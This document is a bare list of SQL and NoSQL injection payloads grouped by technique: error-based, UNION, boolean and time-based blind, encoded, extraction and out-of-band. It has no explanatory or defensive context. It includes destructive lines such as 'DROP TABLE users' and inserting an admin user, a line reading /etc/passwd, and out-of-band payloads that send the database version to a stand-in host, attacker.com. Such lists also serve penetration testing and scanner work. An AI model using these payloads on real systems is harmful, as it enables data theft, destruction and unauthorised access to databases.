# SQL Injection Payloads
# Basic error-based payloads
'
''
`
"`
')
")
'))
")"))
');
");
';
";'
';":
"':';
';waitfor delay '00:00:05'--
';WAITFOR DELAY '00:00:05'--

# UNION-based payloads
' UNION SELECT NULL--
' UNION SELECT 1,2,3--
' UNION SELECT @@version,null,null--
" UNION SELECT NULL--
") UNION SELECT NULL--

# Boolean-based blind payloads
' AND 1=1--
' AND 1=2--
' OR 1=1--
' OR 1=2--
" AND 1=1--
" AND 1=2--
") AND 1=1--
") AND 1=2--

# Time-based blind payloads
'; WAITFOR DELAY '00:00:05'--
'; SELECT pg_sleep(5)--
'; SELECT SLEEP(5)--
' AND SLEEP(5)--
" AND SLEEP(5)--
') AND SLEEP(5)--

# NoSQL injection payloads
'||this.password.match(/.*/)//+%00
',1)/*
'||sleep(5000)//
'}`));//
{"$ne": 1}
{"$regex": ".*"}

# Advanced payloads
' AND (SELECT SUBSTRING(@@version,1,1))='5'--
' AND (SELECT COUNT(*) FROM information_schema.tables)>0--
'; DROP TABLE users--
'; INSERT INTO users VALUES (1,'admin','password')--

# Second-order SQL injection
'+(SELECT LOAD_FILE('/etc/passwd'))+'-- 
'+(SELECT * FROM users LIMIT 1)+'

# SQLi with encoding
%27%20OR%201=1--
%27%29%20OR%201=1--
%2527%2520OR%25201=1--

# Error-based extraction
' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e))--
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(version(), FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) a)--

# Out-of-band payloads
'; EXEC master..xp_dirtree '//attacker.com/share'--
'; SELECT LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\share'))--

